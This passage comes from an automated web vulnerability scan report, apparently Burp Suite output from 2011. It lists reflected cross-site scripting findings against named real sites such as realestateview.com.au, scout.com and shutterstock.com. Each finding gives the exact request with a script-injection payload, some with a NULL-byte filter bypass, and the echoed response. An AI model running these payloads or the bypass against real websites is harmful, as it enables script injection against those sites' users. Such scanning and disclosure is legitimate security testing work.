GET /?97020"><script>alert(1)</script>e43dd183868=1 HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:25 GMT
Expires: Tue Oct 4 21:50:25 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/?97020"><script>alert(1)</script>e43dd183868=1">
...[SNIP]...

1.328. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Business/Buy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9c0"><script>alert(1)</script>dc812266a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Real-Estate2a9c0"><script>alert(1)</script>dc812266a92/Business/Buy.html HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:51 GMT
Expires: Tue Oct 4 21:50:51 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate2a9c0"><script>alert(1)</script>dc812266a92/Business/Buy.html">
...[SNIP]...

1.329. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Business/Buy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00872b4"><script>alert(1)</script>4619782dcc was submitted in the REST URL parameter 2. This input was echoed as 872b4"><script>alert(1)</script>4619782dcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /Real-Estate/Business%00872b4"><script>alert(1)</script>4619782dcc/Buy.html HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:51:03 GMT
Expires: Tue Oct 4 21:51:03 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Business%00872b4"><script>alert(1)</script>4619782dcc/Buy.html">
...[SNIP]...

1.330. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Business/Buy.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e1f31"><script>alert(1)</script>b8e9724422d was submitted in the REST URL parameter 3. This input was echoed as e1f31"><script>alert(1)</script>b8e9724422d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /Real-Estate/Business/Buy.html%00e1f31"><script>alert(1)</script>b8e9724422d HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:51:15 GMT
Expires: Tue Oct 4 21:51:15 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Business/Buy.html%00e1f31"><script>alert(1)</script>b8e9724422d">
...[SNIP]...

1.331. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Business/Buy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3eca"><script>alert(1)</script>b611b4f467c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Real-Estate/Business/Buy.html?d3eca"><script>alert(1)</script>b611b4f467c=1 HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:48 GMT
Expires: Tue Oct 4 21:50:48 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Business/Buy.html?d3eca"><script>alert(1)</script>b611b4f467c=1">
...[SNIP]...

1.332. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Commercial/Buy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d14"><script>alert(1)</script>835ad8e8246 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Real-Estate79d14"><script>alert(1)</script>835ad8e8246/Commercial/Buy.html HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:47 GMT
Expires: Tue Oct 4 21:50:47 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate79d14"><script>alert(1)</script>835ad8e8246/Commercial/Buy.html">
...[SNIP]...

1.333. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Commercial/Buy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a4517"><script>alert(1)</script>cc9c1713e1f was submitted in the REST URL parameter 2. This input was echoed as a4517"><script>alert(1)</script>cc9c1713e1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /Real-Estate/Commercial%00a4517"><script>alert(1)</script>cc9c1713e1f/Buy.html HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:59 GMT
Expires: Tue Oct 4 21:50:59 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Commercial%00a4517"><script>alert(1)</script>cc9c1713e1f/Buy.html">
...[SNIP]...

1.334. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Commercial/Buy.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a5a72"><script>alert(1)</script>f402a17fc37 was submitted in the REST URL parameter 3. This input was echoed as a5a72"><script>alert(1)</script>f402a17fc37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /Real-Estate/Commercial/Buy.html%00a5a72"><script>alert(1)</script>f402a17fc37 HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:51:10 GMT
Expires: Tue Oct 4 21:51:10 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html%00a5a72"><script>alert(1)</script>f402a17fc37">
...[SNIP]...

1.335. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Commercial/Buy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2c02"><script>alert(1)</script>17c2ebc8506 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Real-Estate/Commercial/Buy.html?e2c02"><script>alert(1)</script>17c2ebc8506=1 HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:44 GMT
Expires: Tue Oct 4 21:50:44 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html?e2c02"><script>alert(1)</script>17c2ebc8506=1">
...[SNIP]...

1.336. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Residential/Rent.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bbf"><script>alert(1)</script>06c4488c9ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Real-Estatee5bbf"><script>alert(1)</script>06c4488c9ab/Residential/Rent.html HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:44 GMT
Expires: Tue Oct 4 21:50:44 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estatee5bbf"><script>alert(1)</script>06c4488c9ab/Residential/Rent.html">
...[SNIP]...

1.337. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Residential/Rent.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001c869"><script>alert(1)</script>2bbc2bd1725 was submitted in the REST URL parameter 2. This input was echoed as 1c869"><script>alert(1)</script>2bbc2bd1725 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /Real-Estate/Residential%001c869"><script>alert(1)</script>2bbc2bd1725/Rent.html HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:56 GMT
Expires: Tue Oct 4 21:50:56 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Residential%001c869"><script>alert(1)</script>2bbc2bd1725/Rent.html">
...[SNIP]...

1.338. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Residential/Rent.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0082712"><script>alert(1)</script>d00432a5da6 was submitted in the REST URL parameter 3. This input was echoed as 82712"><script>alert(1)</script>d00432a5da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /Real-Estate/Residential/Rent.html%0082712"><script>alert(1)</script>d00432a5da6 HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:51:08 GMT
Expires: Tue Oct 4 21:51:08 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Residential/Rent.html%0082712"><script>alert(1)</script>d00432a5da6">
...[SNIP]...

1.339. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/Real-Estate/Residential/Rent.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd906"><script>alert(1)</script>ddb84551cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Real-Estate/Residential/Rent.html?dd906"><script>alert(1)</script>ddb84551cfe=1 HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:41 GMT
Expires: Tue Oct 4 21:50:41 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/Real-Estate/Residential/Rent.html?dd906"><script>alert(1)</script>ddb84551cfe=1">
...[SNIP]...

1.340. http://www.realestateview.com.au/agents/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/agents/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31569"><script>alert(1)</script>5c212b6f0cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /agents31569"><script>alert(1)</script>5c212b6f0cb/ HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:46 GMT
Expires: Tue Oct 4 21:50:46 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/agents31569"><script>alert(1)</script>5c212b6f0cb/">
...[SNIP]...

1.341. http://www.realestateview.com.au/holiday-rentals [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/holiday-rentals

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4d8d"><script>alert(1)</script>11a12e0b5b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /holiday-rentals?f4d8d"><script>alert(1)</script>11a12e0b5b9=1 HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:45 GMT
Expires: Tue Oct 4 21:50:45 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/holiday-rentals?f4d8d"><script>alert(1)</script>11a12e0b5b9=1">
...[SNIP]...

1.342. http://www.realestateview.com.au/propertydata/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/propertydata/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3c15"><script>alert(1)</script>2f3d7e76692 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /propertydatad3c15"><script>alert(1)</script>2f3d7e76692/ HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:51 GMT
Expires: Tue Oct 4 21:50:51 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/propertydatad3c15"><script>alert(1)</script>2f3d7e76692/">
...[SNIP]...

1.343. http://www.realestateview.com.au/propertydata/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/propertydata/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f076"><script>alert(1)</script>da58fda2724 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /propertydata/?5f076"><script>alert(1)</script>da58fda2724=1 HTTP/1.1
Host: www.realestateview.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-control: max-age=0, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 04 Oct 2011 21:50:48 GMT
Expires: Tue Oct 4 21:50:48 2011
Pragma: no-cache
Connection: close

<!DOCTYPE HTML>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
<meta http-equiv="X-UA
...[SNIP]...
<link rel="canonical" href="http://www.realestateview.com.au/propertydata/?5f076"><script>alert(1)</script>da58fda2724=1">
...[SNIP]...

1.344. http://www.rkdms.com/redirect [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rkdms.com
Path:	/redirect

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 265cf<script>alert(1)</script>d7eeec2a7b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect?265cf<script>alert(1)</script>d7eeec2a7b0=1 HTTP/1.1
Host: www.rkdms.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:50:37 GMT
Server: Apache
P3P: policyref="http://www.rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR", policyref="http://www.rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR", policyref="http://www.rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95

<html><body>no url<hr>265cf<script>alert(1)</script>d7eeec2a7b0=>1<hr>PORT=80<br></body></html>

1.345. http://www.scout.com/a.z [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fb64c%3balert(1)//983d0f4ba7e was submitted in the c parameter. This input was echoed as fb64c;alert(1)//983d0f4ba7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /a.z?s=143&p=9&c=2fb64c%3balert(1)//983d0f4ba7e&cid=1113761&nid=5881357&fhn=1 HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:51:11 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.30012
X-Streamed: from 192.168.20.181 in 131 ms
Cache-Control: public, s-maxage=600
Expires: Tue, 04 Oct 2011 22:01:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24232

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<
...[SNIP]...
<script type="text/javascript">
   $(function() {
       $("#da728x90").showAd({
           environment: "scout.com",
           site: 143,
contenttype:2fb64c;alert(1)//983d0f4ba7e,
page:9,
           type: "display",
           width: 728,
           height: 90
       });
   });
</script>
...[SNIP]...

1.346. http://www.shutterstock.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shutterstock.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84f8d</script><script>alert(1)</script>8de71102a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /?sid=Google-AU-StockPhotography&gt=photography%20stock&pl=GOAU-1939898105&cr=broad&kw=photography%20stock&84f8d</script><script>alert(1)</script>8de71102a16=1 HTTP/1.1
Host: www.shutterstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:51:43 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_perl/1.30
Vary: Accept-Encoding
Set-Cookie: ssssidd=484f19cc152402db5e14335cb1d73f08; path=/; expires=Thu, 03-Nov-2011 21:51:43 GMT
Set-Cookie: sst_relevance_sort_methods=relevance_sort_methods.sort_method_options3; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:43 GMT
Set-Cookie: sst_Search_Feedback_Flyout_English_100=Search_Feedback_Flyout_English_100.search_feedback2; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:43 GMT
Set-Cookie: sst_single_image_price_test=single_image_price_test.single_image_price_test_v1; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:43 GMT
Set-Cookie: sst_subscribe22_design_test=subscribe22_design_test.subscribe22_design_test_v1b; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:43 GMT
Set-Cookie: sst_Grid_Discovery_Sep_14=Grid_Discovery_Sep_14.grid1; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:43 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.shutterstock.com
Connection: close
Content-Length: 58466

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

